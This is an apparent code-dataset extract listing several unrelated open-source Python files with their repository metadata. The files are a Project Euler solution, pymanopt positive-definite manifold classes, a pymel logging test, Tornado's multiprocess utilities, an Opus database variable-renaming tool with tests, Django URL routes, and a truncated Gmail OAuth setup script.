code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
from math import *
def is_prime(num):
"""Returns True if the number is prime
else False."""
if num == 0 or num == 1:
return False
for x in range(2, num):
if num % x == 0:
return False
else:
return True
def main():
max_divisor = 20
result = 1
prime_nos = prime_nos = filter(is_prime, range(1, 20))
for prime in prime_nos:
a = floor(log(max_divisor)/log(prime))
result = result * pow(prime, a)
print result
if __name__ == '__main__':
main()
| moghya/hacktoberfest-projecteuler | solutions/problem-5/solution.py | Python | gpl-3.0 | 465 |
import warnings
import numpy as np
from numpy import linalg as la, random as rnd
from scipy.linalg import expm
# Workaround for SciPy bug: https://github.com/scipy/scipy/pull/8082
try:
from scipy.linalg import solve_continuous_lyapunov as lyap
except ImportError:
from scipy.linalg import solve_lyapunov as lyap
from pymanopt.manifolds.manifold import EuclideanEmbeddedSubmanifold, Manifold
from pymanopt.tools.multi import multilog, multiprod, multisym, multitransp
class _RetrAsExpMixin:
"""Mixin class which defers calls to the exponential map to the retraction
and issues a warning.
"""
def exp(self, Y, U):
warnings.warn(
"Exponential map for manifold '{:s}' not implemented yet. Using "
"retraction instead.".format(self._get_class_name()),
RuntimeWarning)
return self.retr(Y, U)
class SymmetricPositiveDefinite(EuclideanEmbeddedSubmanifold):
"""Manifold of (n x n)^k symmetric positive definite matrices, based on the
geometry discussed in Chapter 6 of Positive Definite Matrices (Bhatia
2007). Some of the implementation is based on sympositivedefinitefactory.m
from the Manopt MATLAB package. Also see "Conic geometric optimisation on
the manifold of positive definite matrices" (Sra & Hosseini 2013) for more
details.
"""
def __init__(self, n, k=1):
self._n = n
self._k = k
if k == 1:
name = ("Manifold of positive definite ({} x {}) matrices").format(
n, n)
else:
name = "Product manifold of {} ({} x {}) matrices".format(k, n, n)
dimension = int(k * n * (n + 1) / 2)
super().__init__(name, dimension)
@property
def typicaldist(self):
return np.sqrt(self.dim)
def dist(self, x, y):
# Adapted from equation 6.13 of "Positive definite matrices". The
# Cholesky decomposition gives the same result as matrix sqrt. There
# may be more efficient ways to compute this.
c = la.cholesky(x)
c_inv = la.inv(c)
logm = multilog(multiprod(multiprod(c_inv, y), multitransp(c_inv)),
pos_def=True)
return la.norm(logm)
def inner(self, x, u, v):
return np.tensordot(la.solve(x, u), la.solve(x, v), axes=x.ndim)
def proj(self, X, G):
return multisym(G)
def egrad2rgrad(self, x, u):
# TODO: Check that this is correct
return multiprod(multiprod(x, multisym(u)), x)
def ehess2rhess(self, x, egrad, ehess, u):
# TODO: Check that this is correct
return (multiprod(multiprod(x, multisym(ehess)), x) +
multisym(multiprod(multiprod(u, multisym(egrad)), x)))
def norm(self, x, u):
# This implementation is as fast as np.linalg.solve_triangular and is
# more stable, as the above solver tends to output non positive
# definite results.
c = la.cholesky(x)
c_inv = la.inv(c)
return la.norm(multiprod(multiprod(c_inv, u), multitransp(c_inv)))
def rand(self):
# The way this is done is arbitrary. I think the space of p.d.
# matrices would have infinite measure w.r.t. the Riemannian metric
# (cf. integral 0-inf [ln(x)] dx = inf) so impossible to have a
# 'uniform' distribution.
# Generate eigenvalues between 1 and 2
d = np.ones((self._k, self._n, 1)) + rnd.rand(self._k, self._n, 1)
# Generate an orthogonal matrix. Annoyingly qr decomp isn't
# vectorized so need to use a for loop. Could be done using
# svd but this is slower for bigger matrices.
u = np.zeros((self._k, self._n, self._n))
for i in range(self._k):
u[i], r = la.qr(rnd.randn(self._n, self._n))
if self._k == 1:
return multiprod(u, d * multitransp(u))[0]
return multiprod(u, d * multitransp(u))
def randvec(self, x):
k = self._k
n = self._n
if k == 1:
u = multisym(rnd.randn(n, n))
else:
u = multisym(rnd.randn(k, n, n))
return u / self.norm(x, u)
def transp(self, x1, x2, d):
return d
def exp(self, x, u):
# TODO: Check which method is faster depending on n, k.
x_inv_u = la.solve(x, u)
if self._k > 1:
e = np.zeros(np.shape(x))
for i in range(self._k):
e[i] = expm(x_inv_u[i])
else:
e = expm(x_inv_u)
return multiprod(x, e)
# This alternative implementation is sometimes faster though less
# stable. It can return a matrix with small negative determinant.
# c = la.cholesky(x)
# c_inv = la.inv(c)
# e = multiexp(multiprod(multiprod(c_inv, u), multitransp(c_inv)),
# sym=True)
# return multiprod(multiprod(c, e), multitransp(c))
retr = exp
def log(self, x, y):
c = la.cholesky(x)
c_inv = la.inv(c)
logm = multilog(multiprod(multiprod(c_inv, y), multitransp(c_inv)),
pos_def=True)
return multiprod(multiprod(c, logm), multitransp(c))
def zerovec(self, x):
k = self._k
n = self._n
if k == 1:
return np.zeros((k, n, n))
return np.zeros((n, n))
# TODO(nkoep): This could either stay in here (seeing how it's a manifold of
# psd matrices, or in fixed_rank. Alternatively, move this one and
# the next class to a dedicated 'psd_fixed_rank' module.
class _PSDFixedRank(Manifold, _RetrAsExpMixin):
def __init__(self, n, k, name, dimension):
self._n = n
self._k = k
super().__init__(name, dimension)
@property
def typicaldist(self):
return 10 + self._k
def inner(self, Y, U, V):
# Euclidean metric on the total space.
return float(np.tensordot(U, V))
def norm(self, Y, U):
return la.norm(U, "fro")
def dist(self, U, V):
raise NotImplementedError(
"The manifold '{:s}' currently provides no implementation of the "
"'dist' method".format(self._get_class_name()))
def proj(self, Y, H):
# Projection onto the horizontal space
YtY = Y.T.dot(Y)
AS = Y.T.dot(H) - H.T.dot(Y)
Omega = lyap(YtY, AS)
return H - Y.dot(Omega)
def egrad2rgrad(self, Y, egrad):
return egrad
def ehess2rhess(self, Y, egrad, ehess, U):
return self.proj(Y, ehess)
def retr(self, Y, U):
return Y + U
def rand(self):
return rnd.randn(self._n, self._k)
def randvec(self, Y):
H = self.rand()
P = self.proj(Y, H)
return self._normalize(P)
def transp(self, Y, Z, U):
return self.proj(Z, U)
def _normalize(self, Y):
return Y / self.norm(None, Y)
def zerovec(self, X):
return np.zeros((self._n, self._k))
class PSDFixedRank(_PSDFixedRank):
"""
Manifold of n-by-n symmetric positive semidefinite matrices of rank k.
A point X on the manifold is parameterized as YY^T where Y is a matrix of
size nxk. As such, X is symmetric, positive semidefinite. We restrict to
full-rank Y's, such that X has rank exactly k. The point X is numerically
represented by Y (this is more efficient than working with X, which may
be big). Tangent vectors are represented as matrices of the same size as
Y, call them Ydot, so that Xdot = Y Ydot' + Ydot Y. The metric is the
canonical Euclidean metric on Y.
Since for any orthogonal Q of size k, it holds that (YQ)(YQ)' = YY',
we "group" all matrices of the form YQ in an equivalence class. The set
of equivalence classes is a Riemannian quotient manifold, implemented
here.
Notice that this manifold is not complete: if optimization leads Y to be
rank-deficient, the geometry will break down. Hence, this geometry should
only be used if it is expected that the points of interest will have rank
exactly k. Reduce k if that is not the case.
An alternative, complete, geometry for positive semidefinite matrices of
rank k is described in Bonnabel and Sepulchre 2009, "Riemannian Metric
and Geometric Mean for Positive Semidefinite Matrices of Fixed Rank",
SIAM Journal on Matrix Analysis and Applications.
The geometry implemented here is the simplest case of the 2010 paper:
M. Journee, P.-A. Absil, F. Bach and R. Sepulchre,
"Low-Rank Optimization on the Cone of Positive Semidefinite Matrices".
Paper link: http://www.di.ens.fr/~fbach/journee2010_sdp.pdf
"""
def __init__(self, n, k):
name = ("YY' quotient manifold of {:d}x{:d} psd matrices of "
"rank {:d}".format(n, n, k))
dimension = int(k * n - k * (k - 1) / 2)
super().__init__(n, k, name, dimension)
class PSDFixedRankComplex(_PSDFixedRank):
"""
Manifold of n x n complex Hermitian pos. semidefinite matrices of rank k.
Manifold of n-by-n complex Hermitian positive semidefinite matrices of
fixed rank k. This follows the quotient geometry described
in Sarod Yatawatta's 2013 paper:
"Radio interferometric calibration using a Riemannian manifold", ICASSP.
Paper link: http://dx.doi.org/10.1109/ICASSP.2013.6638382.
A point X on the manifold M is parameterized as YY^*, where Y is a
complex matrix of size nxk of full rank. For any point Y on the manifold M,
given any kxk complex unitary matrix U, we say Y*U is equivalent to Y,
i.e., YY^* does not change. Therefore, M is the set of equivalence
classes and is a Riemannian quotient manifold C^{nk}/U(k)
where C^{nk} is the set of all complex matrix of size nxk of full rank.
The metric is the usual real-trace inner product, that is,
it is the usual metric for the complex plane identified with R^2.
Notice that this manifold is not complete: if optimization leads Y to be
rank-deficient, the geometry will break down. Hence, this geometry should
only be used if it is expected that the points of interest will have rank
exactly k. Reduce k if that is not the case.
"""
def __init__(self, n, k):
name = ("YY' quotient manifold of Hermitian {:d}x{:d} complex "
"matrices of rank {:d}".format(n, n, k))
dimension = 2 * k * n - k * k
super().__init__(n, k, name, dimension)
def inner(self, Y, U, V):
return 2 * float(np.tensordot(U, V).real)
def norm(self, Y, U):
return np.sqrt(self.inner(Y, U, U))
def dist(self, U, V):
S, _, D = la.svd(V.T.conj().dot(U))
E = U - V.dot(S).dot(D)
return self.inner(None, E, E) / 2
def rand(self):
rand_ = super().rand
return rand_() + 1j * rand_()
class Elliptope(Manifold, _RetrAsExpMixin):
"""
Manifold of n-by-n psd matrices of rank k with unit diagonal elements.
A point X on the manifold is parameterized as YY^T where Y is a matrix of
size nxk. As such, X is symmetric, positive semidefinite. We restrict to
full-rank Y's, such that X has rank exactly k. The point X is numerically
represented by Y (this is more efficient than working with X, which may be
big). Tangent vectors are represented as matrices of the same size as Y,
call them Ydot, so that Xdot = Y Ydot' + Ydot Y and diag(Xdot) == 0. The
metric is the canonical Euclidean metric on Y.
The diagonal constraints on X (X(i, i) == 1 for all i) translate to
unit-norm constraints on the rows of Y: norm(Y(i, :)) == 1 for all i. The
set of such Y's forms the oblique manifold. But because for any orthogonal
Q of size k, it holds that (YQ)(YQ)' = YY', we "group" all matrices of the
form YQ in an equivalence class. The set of equivalence classes is a
Riemannian quotient manifold, implemented here.
Note that this geometry formally breaks down at rank-deficient Y's. This
does not appear to be a major issue in practice when optimization
algorithms converge to rank-deficient Y's, but convergence theorems no
longer hold. As an alternative, you may use the oblique manifold (it has
larger dimension, but does not break down at rank drop.)
The geometry is taken from the 2010 paper:
M. Journee, P.-A. Absil, F. Bach and R. Sepulchre,
"Low-Rank Optimization on the Cone of Positive Semidefinite Matrices".
Paper link: http://www.di.ens.fr/~fbach/journee2010_sdp.pdf
"""
def __init__(self, n, k):
self._n = n
self._k = k
name = ("YY' quotient manifold of {:d}x{:d} psd matrices of rank {:d} "
"with diagonal elements being 1".format(n, n, k))
dimension = int(n * (k - 1) - k * (k - 1) / 2)
super().__init__(name, dimension)
@property
def typicaldist(self):
return 10 * self._k
def inner(self, Y, U, V):
return float(np.tensordot(U, V))
def dist(self, U, V):
raise NotImplementedError(
"The manifold '{:s}' currently provides no implementation of the "
"'dist' method".format(self._get_class_name()))
def norm(self, Y, U):
return np.sqrt(self.inner(Y, U, U))
# Projection onto the tangent space, i.e., on the tangent space of
# ||Y[i, :]||_2 = 1
def proj(self, Y, H):
eta = self._project_rows(Y, H)
# Projection onto the horizontal space
YtY = Y.T.dot(Y)
AS = Y.T.dot(eta) - H.T.dot(Y)
Omega = lyap(YtY, -AS)
return eta - Y.dot((Omega - Omega.T) / 2)
def retr(self, Y, U):
return self._normalize_rows(Y + U)
# Euclidean gradient to Riemannian gradient conversion. We only need the
# ambient space projection: the remainder of the projection function is not
# necessary because the Euclidean gradient must already be orthogonal to
# the vertical space.
def egrad2rgrad(self, Y, egrad):
return self._project_rows(Y, egrad)
def ehess2rhess(self, Y, egrad, ehess, U):
scaling_grad = (egrad * Y).sum(axis=1)
hess = ehess - U * scaling_grad[:, np.newaxis]
scaling_hess = (U * egrad + Y * ehess).sum(axis=1)
hess -= Y * scaling_hess[:, np.newaxis]
return self.proj(Y, hess)
def rand(self):
return self._normalize_rows(rnd.randn(self._n, self._k))
def randvec(self, Y):
H = self.proj(Y, self.rand())
return H / self.norm(Y, H)
def transp(self, Y, Z, U):
return self.proj(Z, U)
def _normalize_rows(self, Y):
"""Return an l2-row-normalized copy of the matrix Y."""
return Y / la.norm(Y, axis=1)[:, np.newaxis]
# Orthogonal projection of each row of H to the tangent space at the
# corresponding row of X, seen as a point on a sphere.
def _project_rows(self, Y, H):
# Compute the inner product between each vector H[i, :] with its root
# point Y[i, :], i.e., Y[i, :].T * H[i, :]. Returns a row vector.
inners = (Y * H).sum(axis=1)
return H - Y * inners[:, np.newaxis]
def zerovec(self, X):
return np.zeros((self._n, self._k))
| nkoep/pymanopt | pymanopt/manifolds/psd.py | Python | bsd-3-clause | 15,204 |
'''
Created on Oct 16, 2012
@author: paulm
'''
import os
import unittest
import logging
import pymel.internal.plogging as plogging
import pymel.core
class testCase_raiseLog(unittest.TestCase):
DEFAULT_LOGGER = pymel.core._logger
@classmethod
def _makeTest(cls, logLvlName, errorLvlName, logger=None):
logLvl = getattr(logging, logLvlName)
errorLvl = getattr(logging, errorLvlName)
if logger:
funcType = 'method'
func = logger.raiseLog
args = []
else:
funcType = 'function'
func = plogging.raiseLog
args = [cls.DEFAULT_LOGGER]
msg = "attempting %s raiseLog %s (ERRORLEVEL set to %s):" % (logLvlName, funcType, errorLvlName)
args.extend([logLvl, msg])
def raiseLogTest(self):
oldLvl = plogging.ERRORLEVEL
plogging.ERRORLEVEL = errorLvl
try:
kwargs = {'errorClass':TypeError}
if errorLvl <= logLvl:
# the errorLevel is lower than the level we're emitting, it should
# raise an error
self.assertRaises(RuntimeError, func, *args)
self.assertRaises(TypeError, func, *args, **kwargs)
else:
# we should be able to run this without an error...
func(*args)
func(*args, **kwargs)
finally:
plogging.ERRORLEVEL = oldLvl
raiseLogTest.__name__ = 'test_raiseLog_%s_emit_%s_err_%s' % (funcType, logLvlName, errorLvlName)
return raiseLogTest
@classmethod
def addTests(cls):
logLevelNames = ('DEBUG', 'INFO', 'WARNING', 'ERROR')
for logLvlName in logLevelNames:
for errorLvlName in logLevelNames:
for logger in (None, cls.DEFAULT_LOGGER):
test = cls._makeTest(logLvlName, errorLvlName, logger=logger)
setattr(cls, test.__name__, test)
testCase_raiseLog.addTests() | shrtcww/pymel | tests/test_plogging.py | Python | bsd-3-clause | 2,053 |
#!/usr/bin/env python
#
# Copyright 2011 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Utilities for working with multiple processes, including both forking
the server into multiple processes and managing subprocesses.
"""
from __future__ import absolute_import, division, print_function, with_statement
import errno
import multiprocessing
import os
import signal
import subprocess
import sys
import time
from binascii import hexlify
from tornado import ioloop
from tornado.iostream import PipeIOStream
from tornado.log import gen_log
from tornado.platform.auto import set_close_exec
from tornado import stack_context
from tornado.util import errno_from_exception
try:
long # py2
except NameError:
long = int # py3
def cpu_count():
"""Returns the number of processors on this machine."""
try:
return multiprocessing.cpu_count()
except NotImplementedError:
pass
try:
return os.sysconf("SC_NPROCESSORS_CONF")
except ValueError:
pass
gen_log.error("Could not detect number of processors; assuming 1")
return 1
def _reseed_random():
if 'random' not in sys.modules:
return
import random
# If os.urandom is available, this method does the same thing as
# random.seed (at least as of python 2.6). If os.urandom is not
# available, we mix in the pid in addition to a timestamp.
try:
seed = long(hexlify(os.urandom(16)), 16)
except NotImplementedError:
seed = int(time.time() * 1000) ^ os.getpid()
random.seed(seed)
def _pipe_cloexec():
r, w = os.pipe()
set_close_exec(r)
set_close_exec(w)
return r, w
_task_id = None
def fork_processes(num_processes, max_restarts=100):
"""Starts multiple worker processes.
If ``num_processes`` is None or <= 0, we detect the number of cores
available on this machine and fork that number of child
processes. If ``num_processes`` is given and > 0, we fork that
specific number of sub-processes.
Since we use processes and not threads, there is no shared memory
between any server code.
Note that multiple processes are not compatible with the autoreload
module (or the ``autoreload=True`` option to `tornado.web.Application`
which defaults to True when ``debug=True``).
When using multiple processes, no IOLoops can be created or
referenced until after the call to ``fork_processes``.
In each child process, ``fork_processes`` returns its *task id*, a
number between 0 and ``num_processes``. Processes that exit
abnormally (due to a signal or non-zero exit status) are restarted
with the same id (up to ``max_restarts`` times). In the parent
process, ``fork_processes`` returns None if all child processes
have exited normally, but will otherwise only exit by throwing an
exception.
"""
global _task_id
assert _task_id is None
if num_processes is None or num_processes <= 0:
num_processes = cpu_count()
if ioloop.IOLoop.initialized():
raise RuntimeError("Cannot run in multiple processes: IOLoop instance "
"has already been initialized. You cannot call "
"IOLoop.instance() before calling start_processes()")
gen_log.info("Starting %d processes", num_processes)
children = {}
def start_child(i):
pid = os.fork()
if pid == 0:
# child process
_reseed_random()
global _task_id
_task_id = i
return i
else:
children[pid] = i
return None
for i in range(num_processes):
id = start_child(i)
if id is not None:
return id
num_restarts = 0
while children:
try:
pid, status = os.wait()
except OSError as e:
if errno_from_exception(e) == errno.EINTR:
continue
raise
if pid not in children:
continue
id = children.pop(pid)
if os.WIFSIGNALED(status):
gen_log.warning("child %d (pid %d) killed by signal %d, restarting",
id, pid, os.WTERMSIG(status))
elif os.WEXITSTATUS(status) != 0:
gen_log.warning("child %d (pid %d) exited with status %d, restarting",
id, pid, os.WEXITSTATUS(status))
else:
gen_log.info("child %d (pid %d) exited normally", id, pid)
continue
num_restarts += 1
if num_restarts > max_restarts:
raise RuntimeError("Too many child restarts, giving up")
new_id = start_child(id)
if new_id is not None:
return new_id
# All child processes exited cleanly, so exit the master process
# instead of just returning to right after the call to
# fork_processes (which will probably just start up another IOLoop
# unless the caller checks the return value).
sys.exit(0)
def task_id():
"""Returns the current task id, if any.
Returns None if this process was not created by `fork_processes`.
"""
global _task_id
return _task_id
class Subprocess(object):
"""Wraps ``subprocess.Popen`` with IOStream support.
The constructor is the same as ``subprocess.Popen`` with the following
additions:
* ``stdin``, ``stdout``, and ``stderr`` may have the value
``tornado.process.Subprocess.STREAM``, which will make the corresponding
attribute of the resulting Subprocess a `.PipeIOStream`.
* A new keyword argument ``io_loop`` may be used to pass in an IOLoop.
"""
STREAM = object()
_initialized = False
_waiting = {}
def __init__(self, *args, **kwargs):
self.io_loop = kwargs.pop('io_loop', None) or ioloop.IOLoop.current()
# All FDs we create should be closed on error; those in to_close
# should be closed in the parent process on success.
pipe_fds = []
to_close = []
if kwargs.get('stdin') is Subprocess.STREAM:
in_r, in_w = _pipe_cloexec()
kwargs['stdin'] = in_r
pipe_fds.extend((in_r, in_w))
to_close.append(in_r)
self.stdin = PipeIOStream(in_w, io_loop=self.io_loop)
if kwargs.get('stdout') is Subprocess.STREAM:
out_r, out_w = _pipe_cloexec()
kwargs['stdout'] = out_w
pipe_fds.extend((out_r, out_w))
to_close.append(out_w)
self.stdout = PipeIOStream(out_r, io_loop=self.io_loop)
if kwargs.get('stderr') is Subprocess.STREAM:
err_r, err_w = _pipe_cloexec()
kwargs['stderr'] = err_w
pipe_fds.extend((err_r, err_w))
to_close.append(err_w)
self.stderr = PipeIOStream(err_r, io_loop=self.io_loop)
try:
self.proc = subprocess.Popen(*args, **kwargs)
except:
for fd in pipe_fds:
os.close(fd)
raise
for fd in to_close:
os.close(fd)
for attr in ['stdin', 'stdout', 'stderr', 'pid']:
if not hasattr(self, attr): # don't clobber streams set above
setattr(self, attr, getattr(self.proc, attr))
self._exit_callback = None
self.returncode = None
def set_exit_callback(self, callback):
"""Runs ``callback`` when this process exits.
The callback takes one argument, the return code of the process.
This method uses a ``SIGCHILD`` handler, which is a global setting
and may conflict if you have other libraries trying to handle the
same signal. If you are using more than one ``IOLoop`` it may
be necessary to call `Subprocess.initialize` first to designate
one ``IOLoop`` to run the signal handlers.
In many cases a close callback on the stdout or stderr streams
can be used as an alternative to an exit callback if the
signal handler is causing a problem.
"""
self._exit_callback = stack_context.wrap(callback)
Subprocess.initialize(self.io_loop)
Subprocess._waiting[self.pid] = self
Subprocess._try_cleanup_process(self.pid)
@classmethod
def initialize(cls, io_loop=None):
"""Initializes the ``SIGCHILD`` handler.
The signal handler is run on an `.IOLoop` to avoid locking issues.
Note that the `.IOLoop` used for signal handling need not be the
same one used by individual Subprocess objects (as long as the
``IOLoops`` are each running in separate threads).
"""
if cls._initialized:
return
if io_loop is None:
io_loop = ioloop.IOLoop.current()
cls._old_sigchld = signal.signal(
signal.SIGCHLD,
lambda sig, frame: io_loop.add_callback_from_signal(cls._cleanup))
cls._initialized = True
@classmethod
def uninitialize(cls):
"""Removes the ``SIGCHILD`` handler."""
if not cls._initialized:
return
signal.signal(signal.SIGCHLD, cls._old_sigchld)
cls._initialized = False
@classmethod
def _cleanup(cls):
for pid in list(cls._waiting.keys()): # make a copy
cls._try_cleanup_process(pid)
@classmethod
def _try_cleanup_process(cls, pid):
try:
ret_pid, status = os.waitpid(pid, os.WNOHANG)
except OSError as e:
if errno_from_exception(e) == errno.ECHILD:
return
if ret_pid == 0:
return
assert ret_pid == pid
subproc = cls._waiting.pop(pid)
subproc.io_loop.add_callback_from_signal(
subproc._set_returncode, status)
def _set_returncode(self, status):
if os.WIFSIGNALED(status):
self.returncode = -os.WTERMSIG(status)
else:
assert os.WIFEXITED(status)
self.returncode = os.WEXITSTATUS(status)
if self._exit_callback:
callback = self._exit_callback
self._exit_callback = None
callback(self.returncode)
| chrisseto/tornado | tornado/process.py | Python | apache-2.0 | 10,630 |
# Opus/UrbanSim urban simulation software.
# Copyright (C) 2005-2009 University of Washington
# See opus_core/LICENSE
import os
import re
from opus_core.logger import logger
from opus_core.database_management.database_server import DatabaseServer
from opus_core.database_management.configurations.database_server_configuration import DatabaseServerConfiguration
class DBSubPattern(object):
def convert_databases(self, db_config, databases, tables, patterns, backup=True, backup_postfix='_old'):
dbconfig = DatabaseServerConfiguration(
host_name = db_config.host_name,
protocol = 'mysql',
user_name = db_config.user_name,
password = db_config.password
)
db_server = DatabaseServer(dbconfig)
for db_name in databases:
db = db_server.get_database(db_name)
self.convert_database(db, tables[db_name], patterns, backup, backup_postfix)
db.close()
db_server.close()
def convert_database(self, db, tables, patterns, backup=True, backup_postfix='_old'):
for table in tables:
self.convert_table(db, table, patterns, backup, backup_postfix)
def convert_table(self, db, table_name, patterns, backup=True, backup_postfix='_old'):
try: db.DoQuery('select * from %s' % table_name)
except: return
if backup:
backup_table_name = '%s%s' % (table_name, backup_postfix)
i=0
while self._table_exists(db, backup_table_name):
i+=1
backup_table_name = '%s%s%d' % (table_name, backup_postfix, i)
db.DoQuery('create table %(backup_table)s select * from %(table)s;'
% {'backup_table':backup_table_name,
'table':table_name})
try: db.DoQuery('select * from %s' % backup_table_name)
except:
logger.log_error("Back up of table '%s' to '%s' failed. "
"Skipping conversion." % (table_name, backup_table_name))
return
results = db.GetResultsFromQuery('select variable_name from %s'
% table_name)[1:]
results = [i[0] for i in results]
for i in range(len(results)):
try:
new_row = results[i]
for pattern, replacement in patterns:
new_row = re.sub(pattern, replacement, new_row)
except TypeError:
continue # Not dealing with a string here.
if new_row == results[i]:
continue # Nothing changed. Don't bother with the update query.
new_row = '"%s"' % new_row
query = ('update %(table)s set variable_name=%(new_row)s where '
'variable_name="%(old_row)s";'
% {'table':table_name,
'new_row':new_row,
'old_row':results[i]})
db.DoQuery(query)
def _table_exists(self, db, table_name):
try: db.DoQuery('select * from %s' % table_name)
except: return False
else: return True
from opus_core.tests import opus_unittest
from opus_core.database_management.configurations.test_database_configuration import TestDatabaseConfiguration
class TestDBSubPattern(opus_unittest.OpusTestCase):
def setUp(self):
self.test_db_names = [
'convert_database_test_db1',
'convert_database_test_db2',
]
self.test_table_names = [
'table1',
'table2',
'table3',
]
table_schema = 'id INT, do_not_change_this_column TEXT, variable_name TEXT'
table_data = (
'(1,"Does not match P A T T E R N.","Matches pattern."),'
'(2,"Matches pattern.","Does not match P A T T E R N."),'
'(3,NULL,NULL),'
'(4,"","")'
)
self.expected_output_unchanged = [
['id', 'do_not_change_this_column', 'variable_name'],
[1,"Does not match P A T T E R N.","Matches pattern."],
[2,"Matches pattern.","Does not match P A T T E R N."],
[3,None,None],
[4,"",""]
]
self.patterns = [
(r'(pattern)(\.)', r'\1 well\2'),
(r'^Matches pattern well\.$', r'Matches pattern perfectly!')
]
self.expected_output_changed = [
['id', 'do_not_change_this_column', 'variable_name'],
[1,"Does not match P A T T E R N.","Matches pattern perfectly!"],
[2,"Matches pattern.","Does not match P A T T E R N."],
[3,None,None],
[4,"",""]
]
insert_items_template = (
"insert into %(table)s values %(data)s;")
table_list = {}
for db_name in self.test_db_names:
table_list[db_name] = []
for table in self.test_table_names:
table_list[db_name] += [table]
self.config = {
'databases':self.test_db_names,
'tables':table_list,
'backup':True,
'backup_postfix':'_old',
}
self.db_server = DatabaseServer(TestDatabaseConfiguration(protocol = 'mysql'))
self.dbs = []
for db_name in self.test_db_names:
self.db_server.drop_database(db_name)
self.db_server.create_database(db_name)
self.dbs += [self.db_server.get_database(db_name)]
for db in self.dbs:
for table_name in self.test_table_names:
db.DoQuery('create table %s (%s)'
% (table_name,
table_schema))
db.DoQuery(insert_items_template
% {'table':table_name, 'data':table_data})
def tearDown(self):
for db_name in self.test_db_names:
self.db_server.drop_database(db_name)
for db in self.dbs:
db.close()
self.db_server.close()
def test_convert_table(self):
DBSubPattern().convert_table(self.dbs[0], self.test_table_names[0],
self.patterns)
db = self.dbs[0]
table0 = self.test_table_names[0]
results = db.GetResultsFromQuery('select * from %s;' % table0)
self.assert_(results == self.expected_output_changed,
"Convert failed for single table (%s) -- incorrect conversion."
" Expected %s. Recieved %s."
% (table0,
self.expected_output_changed,
results))
for table in self.test_table_names[1:]:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_unchanged,
"Convert failed for single table (%s) -- incorrect conversion."
" Expected %s. Recieved %s."
% (table,
self.expected_output_unchanged,
results))
for db in self.dbs[1:]:
for table in self.test_table_names:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_unchanged,
"Convert failed for single table (%s) -- converted wrong"
" table(s). Expected %s. Recieved %s."
% (table,
self.expected_output_unchanged,
results))
def test_convert_table_backup(self):
db = self.dbs[0]
table = self.test_table_names[0]
DBSubPattern().convert_table(db, table, self.patterns,
backup=True, backup_postfix='_old')
backup_table_name = '%s_old' % table
try:
results = db.GetResultsFromQuery('select * from %s' % backup_table_name)
except:
self.fail("Backup failed for single table (%s) -- backup table (%s) not "
"created." % (table, backup_table_name))
self.assert_(results == self.expected_output_unchanged,
"Backup failed for single table (%s) -- changed contents."
" Expected %s. Recieved %s."
% (table, self.expected_output_unchanged, results)
)
def test_convert_database(self):
DBSubPattern().convert_database(self.dbs[0],
self.test_table_names[0:2], self.patterns)
db = self.dbs[0]
for table in self.test_table_names[0:2]:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_changed,
"Convert failed for database0 (%s) -- incorrect "
"conversion. Expected %s. Recieved %s."
% (table,
self.expected_output_changed,
results))
for table in self.test_table_names[2:]:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_unchanged,
"Convert failed for database0 (%s) -- changed wrong table(s)."
" Expected %s. Recieved %s."
% (table,
self.expected_output_unchanged,
results))
for i in range(len(self.dbs[1:])):
db = self.dbs[i+1]
for table in self.test_table_names:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_unchanged,
"Convert failed for database%s (%s) -- converted wrong"
" table(s). Expected %s. Recieved %s."
% (i,
table,
self.expected_output_unchanged,
results))
def test_convert_databases(self):
DBSubPattern().convert_databases(TestDatabaseConfiguration(protocol='mysql'),
self.config['databases'], self.config['tables'], self.patterns)
for db_name in self.config['databases']:
db = self.db_server.get_database(db_name)
tables = self.config['tables'][db_name]
for table in tables:
results = db.GetResultsFromQuery('select * from %s;' % table)
self.assert_(results == self.expected_output_changed,
"Convert failed %s (%s) -- incorrect conversion."
" Expected %s. Recieved %s."
% (db_name,
table,
self.expected_output_changed,
results))
if __name__ == "__main__":
opus_unittest.main() | christianurich/VIBe2UrbanSim | 3rdparty/opus/src/opus_upgrade/changes_2006_11_16_interaction_set_changes/classes/db_sub_pattern.py | Python | gpl-2.0 | 11,789 |
from django.conf import settings
from django.conf.urls import url
from .views import get_summoner_v3, live_match, test_something, live_match_detail, FrontendAppView, ApiLiveMatch, ChampionInfoView
urlpatterns = [
url(r'^summoner/', get_summoner_v3, name='summoner_lookup'),
url(r'^live/$', live_match, name='live_match'),
url(r'^live/([a-zA-Z0-9]+)/(.+)/$', live_match_detail, name='live-match-detail'),
url(r'^api/live/([a-zA-Z0-9]+)/(.+)/$', ApiLiveMatch.as_view(), name='api-live-match'),
url(r'api/champions/$', ChampionInfoView.as_view(), name='api-champion-info'),
url(r'^summonerprofile/', get_summoner_v3, name='summoner_profile'),
url(r'test/', test_something, name='test'),
url(r'^', FrontendAppView.as_view()),
] | belleandindygames/league | league/champ_chooser/urls.py | Python | mit | 756 |
#!/usr/bin/python
import argparse
import httplib2
import pprint
import base64
from apiclient.discovery import build
from oauth2client.client import flow_from_clientsecrets
from oauth2client.file import Storage
from oauth2client.tools import run_flow, argparser
# Parse the command-line arguments (e.g. --noauth_local_webserver)
parser = argparse.ArgumentParser(parents=[argparser])
flags = parser.parse_args()
print type(flags)
# Path to the client_secret.json file downloaded from the Developer Console
CLIENT_SECRET_FILE = 'client_secret.json'
# Check https://developers.google.com/gmail/api/auth/scopes
# for all available scopes
OAUTH_SCOPE = 'https://www.googleapis.com/auth/gmail.readonly'
# Location of the credentials storage file
STORAGE = Storage('gmail.storage')
# Start the OAuth flow to retrieve credentials
flow = flow_from_clientsecrets(CLIENT_SECRET_FILE, scope=OAUTH_SCOPE)
http = httplib2.Http()
